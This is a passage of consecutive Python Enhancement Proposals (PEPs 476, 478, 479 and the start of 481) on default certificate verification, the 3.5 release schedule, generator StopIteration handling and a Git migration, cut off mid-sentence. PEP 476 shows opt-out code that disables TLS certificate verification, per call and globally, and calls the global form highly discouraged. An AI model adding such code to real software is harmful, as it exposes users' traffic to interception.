PEP 476 – Enabling certificate verification by default for stdlib http clients
Author:
Alex Gaynor <alex.gaynor at gmail.com>
Status:
Final
Type:
Standards Track
Created:
28-Aug-2014
Python-Version:
2.7.9, 3.4.3, 3.5
Resolution:
Python-Dev message
Table of Contents
Abstract
Rationale
Technical Details
Trust database
Backwards compatibility
Opting out
Other protocols
Python Versions
Implementation
Copyright
Abstract
Currently when a standard library http client (the urllib, urllib2,
http, and httplib modules) encounters an https:// URL it will wrap
the network HTTP traffic in a TLS stream, as is necessary to communicate with
such a server. However, during the TLS handshake it will not actually check
that the server’s X509 certificate is signed by a CA in any trust root,
nor will it verify that the Common Name (or Subject Alternate Name) on the
presented certificate matches the requested host.
The failure to do these checks means that anyone with a privileged network
position is able to trivially execute a man in the middle attack against a
Python application using either of these HTTP clients, and change traffic at
will.
This PEP proposes to enable verification of X509 certificate signatures, as
well as hostname verification for Python’s HTTP clients by default, subject to
opt-out on a per-call basis. This change would be applied to Python 2.7, Python
3.4, and Python 3.5.
Rationale
The “S” in “HTTPS” stands for secure. When Python’s users type “HTTPS” they are
expecting a secure connection, and Python should adhere to a reasonable
standard of care in delivering this. Currently we are failing at this, and in
doing so, APIs which appear simple are misleading users.
When asked, many Python users state that they were not aware that Python failed
to perform these validations, and are shocked.
The popularity of requests (which enables these checks by default)
demonstrates that these checks are not overly burdensome in any way, and the
fact that it is widely recommended as a major security improvement over the
standard library clients demonstrates that many expect a higher standard for
“security by default” from their tools.
The failure of various applications to note Python’s negligence in this matter
is a source of regular CVE assignment [1] [2] [3] [4] [5] [6] [7] [8]
[9] [10] [11].
[1]
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4340
[2]
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3533
[3]
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5822
[4]
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5825
[5]
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1909
[6]
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2037
[7]
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2073
[8]
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2191
[9]
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4111
[10]
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6396
[11]
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6444
Technical Details
Python would use the system provided certificate database on all platforms.
Failure to locate such a database would be an error, and users would need to
explicitly specify a location to fix it.
This will be achieved by adding a new ssl._create_default_https_context
function, which is the same as ssl.create_default_context.
http.client can then replace its usage of ssl._create_stdlib_context
with the ssl._create_default_https_context.
Additionally ssl._create_stdlib_context is renamed
ssl._create_unverified_context (an alias is kept around for backwards
compatibility reasons).
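For illustration (this sketch is not part of the proposal’s implementation), the verified behaviour being made the default is essentially what an application gets today by passing an explicitly created default context; the host name below is only an example:
import http.client
import ssl

# ssl.create_default_context() enables certificate and hostname
# verification and loads the system trust database.
context = ssl.create_default_context()

# http.client already accepts an explicit context; under this PEP an
# equivalent verified context becomes the default for https:// URLs.
conn = http.client.HTTPSConnection("www.python.org", context=context)
conn.request("GET", "/")
print(conn.getresponse().status)
conn.close()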
Trust database
This PEP proposes using the system-provided certificate database. Previous
discussions have suggested bundling Mozilla’s certificate database and using
that by default. This was decided against for several reasons:
Using the platform trust database imposes a lower maintenance burden on the
Python developers – shipping our own trust database would require doing a
release every time a certificate was revoked.
Linux vendors, and other downstreams, would unbundle the Mozilla
certificates, resulting in a more fragmented set of behaviors.
Using the platform stores makes it easier to handle situations such as
corporate internal CAs.
OpenSSL also has a pair of environment variables, SSL_CERT_DIR and
SSL_CERT_FILE which can be used to point Python at a different certificate
database.
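For illustration (not part of the proposal itself), these variables are consulted when the default contexts load their verification store; the paths below are placeholders:
import os
import ssl

# Placeholder paths: point OpenSSL at an alternative certificate database
# before any default contexts are created.
os.environ["SSL_CERT_FILE"] = "/path/to/ca-bundle.crt"
os.environ["SSL_CERT_DIR"] = "/path/to/certs"

# get_default_verify_paths() reports which file and directory (taking the
# environment variable overrides into account) will be used.
print(ssl.get_default_verify_paths())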
Backwards compatibility
This change will have the appearance of causing some HTTPS connections to
“break”, because they will now raise an Exception during handshake.
This is misleading, however: in fact these connections are presently failing
silently. An HTTPS URL indicates an expectation of confidentiality and
authentication, and the fact that Python does not actually verify that the user’s
request has been made to the intended server is a bug. Further: “Errors should never pass silently.”
Nevertheless, users who have a need to access servers with self-signed or
incorrect certificates would be able to do so by providing a context with
custom trust roots or which disables validation (documentation should strongly
recommend the former where possible). Users will also be able to add necessary
certificates to system trust stores in order to trust them globally.
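As a sketch of the recommended approach (the CA bundle and URL below are hypothetical), a context can keep full verification while trusting an additional internal CA:
import ssl
import urllib.request

# Keep certificate and hostname verification, but also trust a hypothetical
# corporate-internal CA contained in "internal-ca.pem".
context = ssl.create_default_context()
context.load_verify_locations(cafile="internal-ca.pem")

# Python 3 form; the URL is a placeholder.
with urllib.request.urlopen("https://intranet.example.test/", context=context) as response:
    print(response.status)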
Twisted’s 14.0 release made this same change, and it has been met with almost
no opposition.
Opting out
For users who wish to opt out of certificate verification on a single
connection, they can achieve this by providing the context argument to
urllib.urlopen:
import ssl
import urllib

# This restores the same behavior as before.
context = ssl._create_unverified_context()
urllib.urlopen("https://no-valid-cert", context=context)
It is also possible, though highly discouraged, to globally disable
verification by monkeypatching the ssl module in versions of Python that
implement this PEP:
import ssl

try:
    _create_unverified_https_context = ssl._create_unverified_context
except AttributeError:
    # Legacy Python that doesn't verify HTTPS certificates by default
    pass
else:
    # Handle target environment that doesn't support HTTPS verification
    ssl._create_default_https_context = _create_unverified_https_context
This guidance is aimed primarily at system administrators that wish to adopt
newer versions of Python that implement this PEP in legacy environments that
do not yet support certificate verification on HTTPS connections. For
example, an administrator may opt out by adding the monkeypatch above to
sitecustomize.py in their Standard Operating Environment for Python.
Applications and libraries SHOULD NOT be making this change process wide
(except perhaps in response to a system administrator controlled configuration
setting).
Particularly security sensitive applications should always provide an explicit
application defined SSL context rather than relying on the default behaviour
of the underlying Python implementation.
Other protocols
This PEP only proposes requiring this level of validation for HTTP clients, not
for other protocols such as SMTP.
This is because while a high percentage of HTTPS servers have correct
certificates, as a result of the validation performed by browsers, for other
protocols self-signed or otherwise incorrect certificates are far more common.
Note that for SMTP at least, this appears to be changing and should be reviewed
for a potential similar PEP in the future:
https://www.facebook.com/notes/protect-the-graph/the-current-state-of-smtp-starttls-deployment/1453015901605223
https://www.facebook.com/notes/protect-the-graph/massive-growth-in-smtp-starttls-deployment/1491049534468526
Python Versions
This PEP describes changes that will occur on both the 3.4.x, 3.5 and 2.7.X
branches. For 2.7.X this will require backporting the context
(SSLContext) argument to httplib, in addition to the features already
backported in PEP 466.
Implementation
LANDED: Issue 22366 adds the
context argument to urllib.request.urlopen.
Issue 22417 implements the substance
of this PEP.
Copyright
This document has been placed into the public domain.
PEP 478 – Python 3.5 Release Schedule
Author:
Larry Hastings <larry at hastings.org>
Status:
Final
Type:
Informational
Topic:
Release
Created:
22-Sep-2014
Python-Version:
3.5
Table of Contents
Abstract
Release Manager and Crew
Release Schedule
Features for 3.5
Copyright
Abstract
This document describes the development and release schedule for
Python 3.5. The schedule primarily concerns itself with PEP-sized
items.
Release Manager and Crew
3.5 Release Manager: Larry Hastings
Windows installers: Steve Dower
Mac installers: Ned Deily
Documentation: Georg Brandl
Release Schedule
Python 3.5 has now reached its end-of-life and has been retired.
No more releases will be made.
These are all the historical releases of Python 3.5,
including their release dates.
3.5.0 alpha 1: February 8, 2015
3.5.0 alpha 2: March 9, 2015
3.5.0 alpha 3: March 29, 2015
3.5.0 alpha 4: April 19, 2015
3.5.0 beta 1: May 24, 2015
(Beta 1 is also “feature freeze”–no new features beyond this point.)
3.5.0 beta 2: May 31, 2015
3.5.0 beta 3: July 5, 2015
3.5.0 beta 4: July 26, 2015
3.5.0 release candidate 1: August 10, 2015
3.5.0 release candidate 2: August 25, 2015
3.5.0 release candidate 3: September 7, 2015
3.5.0 final: September 13, 2015
3.5.1 release candidate 1: November 22, 2015
3.5.1 final: December 6, 2015
3.5.2 release candidate 1: Sunday, June 12, 2016
3.5.2 final: Sunday, June 26, 2016
3.5.3 candidate 1: January 2, 2017
3.5.3 final: January 17, 2017
3.5.4 candidate 1: July 25, 2017
3.5.4 final: August 8, 2017
3.5.5 candidate 1: January 23, 2018
3.5.5 final: February 4, 2018
3.5.6 candidate 1: July 19, 2018
3.5.6 final: August 2, 2018
3.5.7 candidate 1: March 4, 2019
3.5.7 final: March 18, 2019
3.5.8 candidate 1: September 9, 2019
3.5.8 candidate 2: October 12, 2019
3.5.8 final: October 29, 2019
3.5.9 final: November 1, 2019
3.5.10 rc1: August 21, 2020
3.5.10 final: September 5, 2020
Features for 3.5
PEP 441, improved Python zip application support
PEP 448, additional unpacking generalizations
PEP 461, “%-formatting” for bytes and bytearray objects
PEP 465, a new operator (“@”) for matrix multiplication
PEP 471, os.scandir(), a fast new directory traversal function
PEP 475, adding support for automatic retries of interrupted system calls
PEP 479, change StopIteration handling inside generators
PEP 484, the typing module, a new standard for type annotations
PEP 485, math.isclose(), a function for testing approximate equality
PEP 486, making the Windows Python launcher aware of virtual environments
PEP 488, eliminating .pyo files
PEP 489, a new and improved mechanism for loading extension modules
PEP 492, coroutines with async and await syntax
Copyright
This document has been placed in the public domain.
PEP 479 – Change StopIteration handling inside generators
Author:
Chris Angelico <rosuav at gmail.com>, Guido van Rossum <guido at python.org>
Status:
Final
Type:
Standards Track
Created:
15-Nov-2014
Python-Version:
3.5
Post-History:
15-Nov-2014, 19-Nov-2014, 05-Dec-2014
Table of Contents
Abstract
Acceptance
Rationale
Background information
Proposal
Consequences for existing code
Writing backwards and forwards compatible code
Examples of breakage
Explanation of generators, iterators, and StopIteration
Transition plan
Alternate proposals
Raising something other than RuntimeError
Supplying a specific exception to raise on return
Making return-triggered StopIterations obvious
Converting the exception inside next()
Sub-proposal: decorator to explicitly request current behaviour
Criticism
Why not fix all __next__() methods?
References
Copyright
Abstract
This PEP proposes a change to generators: when StopIteration is
raised inside a generator, it is replaced with RuntimeError.
(More precisely, this happens when the exception is about to bubble
out of the generator’s stack frame.) Because the change is backwards
incompatible, the feature is initially introduced using a
__future__ statement.
Acceptance
This PEP was accepted by the BDFL on November 22. Because of the
exceptionally short period from first draft to acceptance, the main
objections brought up after acceptance were carefully considered and
have been reflected in the “Alternate proposals” section below.
However, none of the discussion changed the BDFL’s mind and the PEP’s
acceptance is now final. (Suggestions for clarifying edits are still
welcome – unlike IETF RFCs, the text of a PEP is not cast in stone
after its acceptance, although the core design/plan/specification
should not change after acceptance.)
Rationale
The interaction of generators and StopIteration is currently
somewhat surprising, and can conceal obscure bugs. An unexpected
exception should not result in subtly altered behaviour, but should
cause a noisy and easily-debugged traceback. Currently,
StopIteration raised accidentally inside a generator function will
be interpreted as the end of the iteration by the loop construct
driving the generator.
The main goal of the proposal is to ease debugging in the situation
where an unguarded next() call (perhaps several stack frames deep)
raises StopIteration and causes the iteration controlled by the
generator to terminate silently. (Whereas, when some other exception
is raised, a traceback is printed pinpointing the cause of the
problem.)
This is particularly pernicious in combination with the yield from
construct of PEP 380, as it breaks the abstraction that a
subgenerator may be factored out of a generator. That PEP acknowledges this
limitation, but notes that “use cases for these [are] rare to
non-existent”. Unfortunately while intentional use is rare, it is
easy to stumble on these cases by accident:
import contextlib

@contextlib.contextmanager
def transaction():
    print('begin')
    try:
        yield from do_it()
    except:
        print('rollback')
        raise
    else:
        print('commit')

def do_it():
    print('Refactored initial setup')
    yield # Body of with-statement is executed here
    print('Refactored finalization of successful transaction')

def gene():
    for i in range(2):
        with transaction():
            yield i
    # return
    raise StopIteration # This is wrong
    print('Should not be reached')

for i in gene():
    print('main: i =', i)
Here factoring out do_it into a subgenerator has introduced a
subtle bug: if the wrapped block raises StopIteration, under the
current behavior this exception will be swallowed by the context
manager; and, worse, the finalization is silently skipped! Similarly
problematic behavior occurs when an asyncio coroutine raises
StopIteration, causing it to terminate silently, or when next
is used to take the first result from an iterator that unexpectedly
turns out to be empty, for example:
# using the same context manager as above
import pathlib

with transaction():
    print('commit file {}'.format(
        # I can never remember what the README extension is
        next(pathlib.Path('/some/dir').glob('README*'))))
In both cases, the refactoring abstraction of yield from breaks
in the presence of bugs in client code.
Additionally, the proposal reduces the difference between list
comprehensions and generator expressions, preventing surprises such as
the one that started this discussion [2]. Henceforth, the following
statements will produce the same result if either produces a result at
all:
a = list(F(x) for x in xs if P(x))
a = [F(x) for x in xs if P(x)]
With the current state of affairs, it is possible to write a function
F(x) or a predicate P(x) that causes the first form to produce
a (truncated) result, while the second form raises an exception
(namely, StopIteration). With the proposed change, both forms
will raise an exception at this point (albeit RuntimeError in the
first case and StopIteration in the second).
Finally, the proposal also clears up the confusion about how to
terminate a generator: the proper way is return, not
raise StopIteration.
As an added bonus, the above changes bring generator functions much
more in line with regular functions. If you wish to take a piece of
code presented as a generator and turn it into something else, you
can usually do this fairly simply, by replacing every yield with
a call to print() or list.append(); however, if there are any
bare next() calls in the code, you have to be aware of them. If
the code was originally written without relying on StopIteration
terminating the function, the transformation would be that much
easier.
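For illustration (this example is not from the PEP), such a transformation looks like this; the bare next() calls are the part that needs attention once the function is no longer a generator:
def pairs_gen(it):
    # Generator version: a StopIteration from the bare next() calls
    # currently just ends the iteration silently.
    while True:
        first = next(it)
        second = next(it)   # may raise StopIteration for odd-length input
        yield (first, second)

def pairs_list(it):
    # The same code with each yield replaced by an append: the bare
    # next() calls now need explicit handling to end the loop.
    result = []
    try:
        while True:
            first = next(it)
            second = next(it)
            result.append((first, second))
    except StopIteration:
        return result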
Background information
When a generator frame is (re)started as a result of a __next__()
(or send() or throw()) call, one of three outcomes can occur:
A yield point is reached, and the yielded value is returned.
The frame is returned from; StopIteration is raised.
An exception is raised, which bubbles out.
In the latter two cases the frame is abandoned (and the generator
object’s gi_frame attribute is set to None).
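A minimal demonstration of the first two outcomes (not taken from the PEP):
def g():
    yield 1          # outcome 1: a yield point is reached

gen = g()
print(next(gen))     # 1
try:
    next(gen)        # outcome 2: the frame returns; StopIteration is raised
except StopIteration:
    pass
print(gen.gi_frame)  # None -- the frame has been abandoned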
Proposal
If a StopIteration is about to bubble out of a generator frame, it
is replaced with RuntimeError, which causes the next() call
(which invoked the generator) to fail, passing that exception out.
From then on it’s just like any old exception. [3]
This affects the third outcome listed above, without altering any
other effects. Furthermore, it only affects this outcome when the
exception raised is StopIteration (or a subclass thereof).
Note that the proposed replacement happens at the point where the
exception is about to bubble out of the frame, i.e. after any
except or finally blocks that could affect it have been
exited. The StopIteration raised by returning from the frame is
not affected (the point being that StopIteration means that the
generator terminated “normally”, i.e. it did not raise an exception).
A subtle issue is what will happen if the caller, having caught the
RuntimeError, calls the generator object’s __next__() method
again. The answer is that from this point on it will raise
StopIteration – the behavior is the same as when any other
exception was raised by the generator.
Another logical consequence of the proposal: if someone uses
g.throw(StopIteration) to throw a StopIteration exception into
a generator, if the generator doesn’t catch it (which it could do
using a try/except around the yield), it will be transformed
into RuntimeError.
During the transition phase, the new feature must be enabled
per-module using:
from __future__ import generator_stop
Any generator function constructed under the influence of this
directive will have the REPLACE_STOPITERATION flag set on its code
object, and generators with the flag set will behave according to this
proposal. Once the feature becomes standard, the flag may be dropped;
code should not inspect generators for it.
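As an illustrative sketch of the new behaviour (under Python 3.5 and 3.6 the __future__ import is required; from 3.7 onward it is the default):
from __future__ import generator_stop

def first_item(iterable):
    it = iter(iterable)
    yield next(it)   # unguarded next(): StopIteration escapes if the iterable is empty

gen = first_item([])
try:
    next(gen)
except RuntimeError as exc:
    # The escaping StopIteration has been replaced with RuntimeError.
    print(type(exc))   # <class 'RuntimeError'>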
A proof-of-concept patch has been created to facilitate testing. [4]
Consequences for existing code
This change will affect existing code that depends on
StopIteration bubbling up. The pure Python reference
implementation of groupby [5] currently has comments “Exit on
StopIteration” where it is expected that the exception will
propagate and then be handled. This will be unusual, but not unknown,
and such constructs will fail. Other examples abound, e.g. [6], [7].
(Alyssa Coghlan comments: “””If you wanted to factor out a helper
function that terminated the generator you’d have to do “return
yield from helper()” rather than just “helper()”.”””)
There are also examples of generator expressions floating around that
rely on a StopIteration raised by the expression, the target or the
predicate (rather than by the __next__() call implied in the for
loop proper).
Writing backwards and forwards compatible code
With the exception of hacks that raise StopIteration to exit a
generator expression, it is easy to write code that works equally well
under older Python versions as under the new semantics.
This is done by enclosing those places in the generator body where a
StopIteration is expected (e.g. bare next() calls or in some
cases helper functions that are expected to raise StopIteration)
in a try/except construct that returns when StopIteration is
raised. The try/except construct should appear directly in the
generator function; doing this in a helper function that is not itself
a generator does not work. If raise StopIteration occurs directly
in a generator, simply replace it with return.
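A sketch of that pattern (the helper below is illustrative, not from the standard library):
def chunked(iterable, size):
    # Works identically before and after this PEP: the StopIteration
    # expected from the bare next() is caught directly in the generator
    # body and turned into a plain return.
    it = iter(iterable)
    while True:
        chunk = []
        try:
            for _ in range(size):
                chunk.append(next(it))
        except StopIteration:
            if chunk:
                yield chunk
            return
        yield chunk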
Examples of breakage
Generators which explicitly raise StopIteration can generally be
changed to simply return instead. This will be compatible with all
existing Python versions, and will not be affected by __future__.
Here are some illustrations from the standard library.
Lib/ipaddress.py:
if other == self:
    raise StopIteration
Becomes:
if other == self:
    return
In some cases, this can be combined with yield from to simplify
the code, such as Lib/difflib.py:
if context is None:
    while True:
        yield next(line_pair_iterator)
Becomes:
if context is None:
    yield from line_pair_iterator
    return
(The return is necessary for a strictly-equivalent translation,
though in this particular file, there is no further code, and the
return can be omitted.) For compatibility with pre-3.3 versions
of Python, this could be written with an explicit for loop:
if context is None:
    for line in line_pair_iterator:
        yield line
    return
More complicated iteration patterns will need explicit try/except
constructs. For example, a hypothetical parser like this:
def parser(f):
    while True:
        data = next(f)
        while True:
            line = next(f)
            if line == "- end -": break
            data += line
        yield data
would need to be rewritten as:
def parser(f):
    while True:
        try:
            data = next(f)
            while True:
                line = next(f)
                if line == "- end -": break
                data += line
            yield data
        except StopIteration:
            return
or possibly:
def parser(f):
    for data in f:
        while True:
            line = next(f)
            if line == "- end -": break
            data += line
        yield data
The latter form obscures the iteration by purporting to iterate over
the file with a for loop, but then also fetches more data from
the same iterator during the loop body. It does, however, clearly
differentiate between a “normal” termination (StopIteration
instead of the initial line) and an “abnormal” termination (failing
to find the end marker in the inner loop, which will now raise
RuntimeError).
This effect of StopIteration has been used to cut a generator
expression short, creating a form of takewhile:
def stop():
    raise StopIteration

print(list(x for x in range(10) if x < 5 or stop()))
# prints [0, 1, 2, 3, 4]
Under the current proposal, this form of non-local flow control is
not supported, and would have to be rewritten in statement form:
def gen():
    for x in range(10):
        if x >= 5: return
        yield x

print(list(gen()))
# prints [0, 1, 2, 3, 4]
While this is a small loss of functionality, it is functionality that
often comes at the cost of readability, and just as lambda has
restrictions compared to def, so does a generator expression have
restrictions compared to a generator function. In many cases, the
transformation to full generator function will be trivially easy, and
may improve structural clarity.
Explanation of generators, iterators, and StopIteration
The proposal does not change the relationship between generators and
iterators: a generator object is still an iterator, and not all
iterators are generators. Generators have additional methods that
iterators don’t have, like send and throw. All this is
unchanged. Nothing changes for generator users – only authors of
generator functions may have to learn something new. (This includes
authors of generator expressions that depend on early termination of
the iteration by a StopIteration raised in a condition.)
An iterator is an object with a __next__ method. Like many other
special methods, it may either return a value, or raise a specific
exception - in this case, StopIteration - to signal that it has
no value to return. In this, it is similar to __getattr__ (can
raise AttributeError), __getitem__ (can raise KeyError),
and so on. A helper function for an iterator can be written to
follow the same protocol; for example:
def helper(x, y):
    if x > y: return 1 / (x - y)
    raise StopIteration

def __next__(self):
    if self.a: return helper(self.b, self.c)
    return helper(self.d, self.e)
Both forms of signalling are carried through: a returned value is
returned, an exception bubbles up. The helper is written to match
the protocol of the calling function.
A generator function is one which contains a yield expression.
Each time it is (re)started, it may either yield a value, or return
(including “falling off the end”). A helper function for a generator
can also be written, but it must also follow generator protocol:
def helper(x, y):
    if x > y: yield 1 / (x - y)

def gen(self):
    if self.a: return (yield from helper(self.b, self.c))
    return (yield from helper(self.d, self.e))
In both cases, any unexpected exception will bubble up. Due to the
nature of generators and iterators, an unexpected StopIteration
inside a generator will be converted into RuntimeError, but
beyond that, all exceptions will propagate normally.
Transition plan
Python 3.5: Enable new semantics under __future__ import; silent
deprecation warning if StopIteration bubbles out of a generator
not under __future__ import.
Python 3.6: Non-silent deprecation warning.
Python 3.7: Enable new semantics everywhere.
Alternate proposals
Raising something other than RuntimeError
Rather than the generic RuntimeError, it might make sense to raise
a new exception type UnexpectedStopIteration. This has the
downside of implicitly encouraging that it be caught; the correct
action is to catch the original StopIteration, not the chained
exception.
Supplying a specific exception to raise on return
Alyssa (Nick) Coghlan suggested a means of providing a specific
StopIteration instance to the generator; if any other instance of
StopIteration is raised, it is an error, but if that particular
one is raised, the generator has properly completed. This subproposal
has been withdrawn in favour of better options, but is retained for
reference.
Making return-triggered StopIterations obvious
For certain situations, a simpler and fully backward-compatible
solution may be sufficient: when a generator returns, instead of
raising StopIteration, it raises a specific subclass of
StopIteration (GeneratorReturn) which can then be detected.
If it is not that subclass, it is an escaping exception rather than a
return statement.
The inspiration for this alternative proposal was Alyssa’s observation
[8] that if an asyncio coroutine [9] accidentally raises
StopIteration, it currently terminates silently, which may present
a hard-to-debug mystery to the developer. The main proposal turns
such accidents into clearly distinguishable RuntimeError exceptions,
but if that is rejected, this alternate proposal would enable
asyncio to distinguish between a return statement and an
accidentally-raised StopIteration exception.
Of the three outcomes listed above, two change:
If a yield point is reached, the value, obviously, would still be
returned.
If the frame is returned from, GeneratorReturn (rather than
StopIteration) is raised.
If an instance of GeneratorReturn would be raised, instead an
instance of StopIteration would be raised. Any other exception
bubbles up normally.
In the third case, the StopIteration would have the value of
the original GeneratorReturn, and would reference the original
exception in its __cause__. If uncaught, this would clearly show
the chaining of exceptions.
This alternative does not affect the discrepancy between generator
expressions and list comprehensions, but allows generator-aware code
(such as the contextlib and asyncio modules) to reliably
differentiate between the second and third outcomes listed above.
However, once code exists that depends on this distinction between
GeneratorReturn and StopIteration, a generator that invokes
another generator and relies on the latter’s StopIteration to
bubble out would still be potentially wrong, depending on the use made
of the distinction between the two exception types.
Converting the exception inside next()
Mark Shannon suggested [10] that the problem could be solved in
next() rather than at the boundary of generator functions. By
having next() catch StopIteration and raise instead
ValueError, all unexpected StopIteration bubbling would be
prevented; however, the backward-incompatibility concerns are far
more serious than for the current proposal, as every next() call
now needs to be rewritten to guard against ValueError instead of
StopIteration - not to mention that there is no way to write one
block of code which reliably works on multiple versions of Python.
(Using a dedicated exception type, perhaps subclassing ValueError,
would help this; however, all code would still need to be rewritten.)
Note that calling next(it, default) catches StopIteration and
substitutes the given default value; this feature is often useful to
avoid a try/except block.
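For example:
it = iter([])
# The two-argument form swallows the StopIteration and returns the default,
# so no try/except block (and no RuntimeError conversion) is involved.
print(next(it, "empty"))    # prints: empty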
Sub-proposal: decorator to explicitly request current behaviour
Alyssa Coghlan suggested [11] that the situations where the current
behaviour is desired could be supported by means of a decorator:
from itertools import allow_implicit_stop

@allow_implicit_stop
def my_generator():
    ...
    yield next(it)
    ...
Which would be semantically equivalent to:
def my_generator():
    try:
        ...
        yield next(it)
        ...
    except StopIteration:
        return
but be faster, as it could be implemented by simply permitting the
StopIteration to bubble up directly.
Single-source Python 2/3 code would also benefit in a 3.7+ world,
since libraries like six and python-future could just define their own
version of “allow_implicit_stop” that referred to the new builtin in
3.5+, and was implemented as an identity function in other versions.
However, due to the implementation complexities required, the ongoing
compatibility issues created, the subtlety of the decorator’s effect,
and the fact that it would encourage the “quick-fix” solution of just
slapping the decorator onto all generators instead of properly fixing
the code in question, this sub-proposal has been rejected. [12]
Criticism
Unofficial and apocryphal statistics suggest that this is seldom, if
ever, a problem. [13] Code does exist which relies on the current
behaviour (e.g. [3], [6], [7]), and there is the concern that this
would be unnecessary code churn to achieve little or no gain.
Steven D’Aprano started an informal survey on comp.lang.python [14];
at the time of writing only two responses have been received: one was
in favor of changing list comprehensions to match generator
expressions (!), the other was in favor of this PEP’s main proposal.
The existing model has been compared to the perfectly-acceptable
issues inherent to every other case where an exception has special
meaning. For instance, an unexpected KeyError inside a
__getitem__ method will be interpreted as failure, rather than
permitted to bubble up. However, there is a difference. Special
methods use return to indicate normality, and raise to signal
abnormality; generators yield to indicate data, and return to
signal the abnormal state. This makes explicitly raising
StopIteration entirely redundant, and potentially surprising. If
other special methods had dedicated keywords to distinguish between
their return paths, they too could turn unexpected exceptions into
RuntimeError; the fact that they cannot should not preclude
generators from doing so.
Why not fix all __next__() methods?
When implementing a regular __next__() method, the only way to
indicate the end of the iteration is to raise StopIteration. So
catching StopIteration here and converting it to RuntimeError
would defeat the purpose. This is a reminder of the special status of
generator functions: in a generator function, raising
StopIteration is redundant since the iteration can be terminated
by a simple return.
References
[2]
Initial mailing list comment
(https://mail.python.org/pipermail/python-ideas/2014-November/029906.html)
[3] (1, 2)
Proposal by GvR
(https://mail.python.org/pipermail/python-ideas/2014-November/029953.html)
[4]
Tracker issue with Proof-of-Concept patch
(http://bugs.python.org/issue22906)
[5]
Pure Python implementation of groupby
(https://docs.python.org/3/library/itertools.html#itertools.groupby)
[6] (1, 2)
Split a sequence or generator using a predicate
(http://code.activestate.com/recipes/578416-split-a-sequence-or-generator-using-a-predicate/)
[7] (1, 2)
wrap unbounded generator to restrict its output
(http://code.activestate.com/recipes/66427-wrap-unbounded-generator-to-restrict-its-output/)
[8]
Post from Alyssa (Nick) Coghlan mentioning asyncio
(https://mail.python.org/pipermail/python-ideas/2014-November/029961.html)
[9]
Coroutines in asyncio
(https://docs.python.org/3/library/asyncio-task.html#coroutines)
[10]
Post from Mark Shannon with alternate proposal
(https://mail.python.org/pipermail/python-dev/2014-November/137129.html)
[11]
Idea from Alyssa Coghlan
(https://mail.python.org/pipermail/python-dev/2014-November/137201.html)
[12]
Rejection of above idea by GvR
(https://mail.python.org/pipermail/python-dev/2014-November/137243.html)
[13]
Response by Steven D’Aprano
(https://mail.python.org/pipermail/python-ideas/2014-November/029994.html)
[14]
Thread on comp.lang.python started by Steven D’Aprano
(https://mail.python.org/pipermail/python-list/2014-November/680757.html)
Copyright
This document has been placed in the public domain.
PEP 481 – Migrate CPython to Git, Github, and Phabricator
Author:
Donald Stufft <donald at stufft.io>
Status:
Withdrawn
Type:
Process
Created:
29-Nov-2014
Post-History:
29-Nov-2014
Table of Contents
Abstract
Rationale
Version Control System
Repository Hosting
Code Review
GitHub Pull Requests
Phabricator
Criticism
X is not written in Python
GitHub is not Free/Open Source
Mercurial is better than Git
CPython Workflow is too Complicated
Example: Scientific Python
References
Copyright
Abstract
Note
This PEP has been withdrawn; if you’re looking for the PEP
documenting the move to Github, please refer to PEP 512.
This PEP proposes migrating the repository hosting of CPython and the
supporting repositories to Git and Github. It also proposes adding Phabricator
as an alternative to Github Pull Requests to handle reviewing changes. This
particular PEP is offered as an alternative to PEP 474 and PEP 462, which aim
to achieve the same overall benefits but restrict themselves to tools that support
Mercurial and are completely Open Source.
Rationale
CPython is an open source project which relies on a number of volunteers
donating their time. As an open source project it relies on attracting new
volunteers as well as retaining existing ones in order to continue to have
a healthy amount of manpower available. In addition to increasing the amount of
manpower that is available to the project, it also needs to allow for effective
use of what manpower is available.
The current toolchain of the CPython project is a custom and unique combination
of tools which mandates a workflow that is similar to one found in a lot of
older projects, but which is becoming less and less popular as time goes on.
The one-off nature of the CPython toolchain and workflow means that any new
contributor is going to need to spend time learning the tools and workflow before
they can start contributing to CPython. Once a new contributor goes through
the process of learning the CPython workflow they also are unlikely to be able
to take that knowledge and apply it to future projects they wish to contribute
to. This acts as a barrier to contribution which will scare off potential new
contributors.
In addition the tooling that CPython uses is under-maintained, antiquated,
and it lacks important features that enable committers to more effectively use
their time when reviewing and approving changes. The fact that it is
under-maintained means that bugs are likely to last for longer, if they ever
get fixed, and that the system is more likely to go down for extended periods of time.
The fact that it is antiquated means that it doesn’t effectively harness the
capabilities of the modern web platform. Finally the fact that it lacks several
important features, such as pre-testing of commits and an
automatic merge tool, means that committers have to do needless busy work to
commit even the simplest of changes.
Version Control System
The first decision that needs to be made is the VCS of the primary server side
repository. Currently the CPython repository, as well as a number of supporting
repositories, uses Mercurial. When evaluating the VCS we must consider the
capabilities of the VCS itself as well as the network effect and mindshare of
the community around that VCS.
There are really only two real options for this, Mercurial and Git. Between the
two of them the technical capabilities are largely equivalent. For this reason
this PEP will largely ignore the technical arguments about the VCS system and
will instead focus on the social aspects.
It is not possible to get exact numbers for the number of projects or people
which are using a particular VCS, however we can infer this by looking at
several sources of information for what VCS projects are using.
The Open Hub (previously Ohloh) statistics [1] show that 37% of
the repositories indexed by The Open Hub are using Git (second only to SVN
which has 48%) while Mercurial has just 2% (beating only bazaar which has 1%).
This has Git being just over 18 times as popular as Mercurial on The Open Hub.
Another source of information on the popularity of the different VCSs is PyPI
itself. This source is more targeted at the Python community itself since it
represents projects developed for Python. Unfortunately PyPI does not have a
standard location for representing this information, so this requires manual
processing. If we limit our search to the top 100 projects on PyPI (ordered
by download counts) we can see that 62% of them use Git, 22% of them use
Mercurial, and 13% use something else. This has Git being just under 3 times
as popular as Mercurial for the top 100 projects on PyPI.
Obviously from these numbers Git is by far the more popular DVCS for open
source projects and choosing the more popular VCS has a number of positive
benefits.
For new contributors it increases the likelihood that they will have already
learned the basics of Git as part of working with another project or if they
are just now learning Git, that they’ll be able to take that knowledge and
apply it to other projects. Additionally a larger community means more people
